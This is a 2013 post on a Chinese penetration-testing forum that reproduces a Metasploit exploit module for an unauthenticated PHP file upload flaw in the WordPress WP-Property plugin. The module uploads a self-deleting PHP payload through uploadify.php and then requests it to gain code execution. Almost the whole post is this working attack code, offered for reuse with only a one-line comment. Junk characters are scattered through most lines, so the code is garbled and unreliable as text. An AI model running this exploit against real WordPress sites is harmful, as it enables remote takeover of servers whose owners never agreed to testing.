找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 WordPress WP-Property PHP 文件上传漏洞
返回列表 发新帖
查看: 2890|回复: 0
打印 上一主题 下一主题

WordPress WP-Property PHP 文件上传漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-1-4 19:51:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
WordPress WP-Property PHP 文件上传漏洞4 }/ I* i5 g6 _% E! ]" C/ A& Z

. }# @+ d" ]5 p/ ]# H7 G ## # This file is part of the Metasploit Framework and may be subject to8 Z& u. f; K. S: J8 p! Q. a; n' l# ?
& `* _, [! z# c2 q5 G
# redistribution and commercial restrictions. Please see the Metasploit
$ |. G8 h8 @9 s! C, I  l/ {
! W- k/ r/ O# F  o6 g# Framework web site for more information on licensing and terms of use.
6 ]3 W/ w& \9 _3 y/ Z' P% e% i
# s3 h2 s: F4 D) x' O  T4 H#   http://metasploit.com/framework/ ##
* C+ b0 g" Y* }6 x5 {% n. L% Y1 V. }, i! i
" Q: \& {3 s" S; ^
$ K, p" Y1 P( K

6 Y  y  ~- E3 e, e9 F6 ^: K1 Z! \9 Q$ f( ?
require 'msf/core'
3 ~/ ]6 a5 \% Q8 s- O  n/ Q0 {require 'msf/core/exploit/php_exe'
8 E4 q1 d3 w% m% a  {- g' K% x5 R% u* m' A2 t' t1 j0 Q
class Metasploit3 < Msf::Exploit::Remote     Rank = ExcellentRanking       include Msf::Exploit::Remote::HttpClient     include Msf::Exploit:hpEXE       def initialize(info = {})         super(update_info(info,             'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',/ I9 s4 Y7 E8 T* G, j+ }
'Description'    => %q{. R# ^( C; q( |  o# c8 |
This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress                 plugin. By abusing the uploadify.php file, a malicious user can upload a file to a                 temp directory without authentication, which results in arbitrary code execution.             },             'Author'         =>
, _- G& J8 @3 p9 X[
" `) C: O, G, T5 v% J- U* L'Sammy FORGIT', # initial discovery
8 X  Q1 s- M5 j'James Fitts <fitts.james[at]gmail.com>' # metasploit module6 X( g9 L& o( T4 ^- v! a7 B. S
],
' J# Y8 m- t  _( a, {+ m- s'License'        => MSF_LICENSE,
+ h6 e" r( K4 T  j( n'References'     =>
8 A( R# a- p5 X' S, i[- z' J8 o  c' N! P
[ 'OSVDB', '82656' ],; m0 b1 B2 K( K: @( F
[ 'BID', '53787' ],$ m; Y+ q1 {% s: g, b% A
[ 'EDB', '18987'],
% p8 C4 W; k! d0 [[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]' f, p( |3 O  r' X. q
],$ z! n6 G% O& |' M& A  u
'Payload'        =>
. s9 f+ ?# G2 h{8 f0 T* [  s6 I/ F$ Y8 |
'BadChars' => "\x00",9 T4 x, x6 M+ c% n; o
},
. i8 T1 M" D+ Z1 B7 A& \'Platform'       => 'php',1 p$ j% c' D6 Y) T/ l; ?& T3 t
'Arch'           => ARCH_PHP,; f2 G" X* p* ^
'Targets'        =>  `) G( W+ J+ g6 F* }  ^0 i* w0 g
[
1 b5 d  O% r- m+ S6 Y& ]; I4 D[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],7 B2 Q2 V) F8 K+ ?* B& p
[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]" E& S: C0 a1 X7 ^- y4 j
],
3 F" `+ e% ]( [7 n& p5 L'DefaultTarget'  => 0,
- J0 @# B1 l( U  I) P% }3 u'DisclosureDate' => 'Mar 26 2012'))
; e8 Y9 O# l( h5 r3 F' ~0 ~5 O3 K, s1 `% s$ P2 U- U5 _
register_options(
- g  j4 {/ U* Y2 E[
. A6 g; U$ e- [7 \  C5 P( gOptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
( X5 ?+ q( m; o5 l2 d# p3 C0 H], self.class)- i, v# k7 k8 i* W% {' ~
end
, T! _3 E' d) F
) [6 ?( n- r% s4 Vdef check
9 I' ]7 K+ X+ E' U/ X2 Ouri =  target_uri.path
" F! r5 W" j4 I4 P" I9 H5 _uri << '/' if uri[-1,1] != '/'           res = send_request_cgi({             'method' => 'GET',( m, b' ~; ^+ ^$ v' q7 ]
'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"' P: a4 B1 t' r+ w; ]
})
0 H5 P  M3 O# l& j! c7 W% W
1 \; D" R2 a8 I6 C9 N3 Qif not res or res.code != 200
' B8 }. A% F- D( b3 ^$ Ereturn Exploit::CheckCode::Unknown8 X, X$ y' K/ X; R4 G' E4 o
end- r& @' u8 L7 k* \
9 V0 K, I2 Q) N% o% `
return Exploit::CheckCode::Appears
. W2 \! L# [$ W9 s- s2 M& }end
5 g8 C& J7 D: |6 h: s' v3 _3 L$ L  w9 @& D6 ~4 a3 ]
def exploit, ?3 F; ^5 _8 g6 g
uri =  target_uri.path
8 h( I# s" P9 T  Ruri << '/' if uri[-1,1] != '/'           peer = "#{rhost}:#{rport}"           @payload_name = "#{rand_text_alpha(5)}.php"         php_payload = get_write_exec_payload(:unlink_self=>true)
0 }& r: [3 B2 w1 f
+ t% O# w2 r5 K) Vdata = Rex::MIME::Message.new
# v0 c6 G* g& r( S9 S& m0 Pdata.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")& }# b+ w# s9 t: L% z3 I) u
data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
/ a4 P) ~1 C' C, Rpost_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')! b* f' P% D, i+ L8 K1 t' J
# ]$ N- @9 l1 c) ]+ h1 J% l
print_status("#{peer} - Uploading payload #{@payload_name}")
2 x5 K& v" L! \# B% P1 |" `& A4 sres = send_request_cgi({" Z& ]6 P5 A: v6 ]4 U
'method' => 'POST',6 W! P2 y. P- Q& z  l8 F
'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
* r8 r8 |9 p) l/ |1 h) w  p'ctype'  => "multipart/form-data; boundary=#{data.bound}",* o) |1 U) n/ r4 @8 r& s' j8 m* X
'data'   => post_data8 h' I4 R2 q7 ^, J9 s9 j
})6 M! [( S+ b5 p& {2 h" e7 [
  x9 C- [7 P! [9 z6 j4 t
if not res or res.code != 200 or res.body !~ /#{@payload_name}/
/ p$ R8 o  G3 p& D; {fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")0 k/ s2 {% l; w  F8 f
end: }5 R6 q5 B& l  w( a

; _6 V5 U9 {6 i" Jupload_uri = res.body7 W8 @+ O/ ^0 p" k0 V0 m
) a; Q9 D% {# b
print_status("#{peer} - Executing payload #{@payload_name}")
' v9 O6 T! a* \) lres = send_request_raw({# F/ o0 I  b- w6 M9 c4 O( c1 M
'uri'    => upload_uri,. y$ o: V  D, `" M2 w. n
'method' => 'GET'% y. g* x. _2 ~) k
})4 {5 c7 l. O5 O8 a
end
/ H$ R1 ^$ P( j5 G- Vend
& l1 D) |" ]$ v; R
8 Z& L7 C# w1 J/ V( L- V不要问我这写的是什么 怎么利用 我是说msf.6 v1 l9 B5 @" A4 l7 f4 a2 f
2 b/ I, |2 ~9 M& r5 D6 S9 j8 J
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表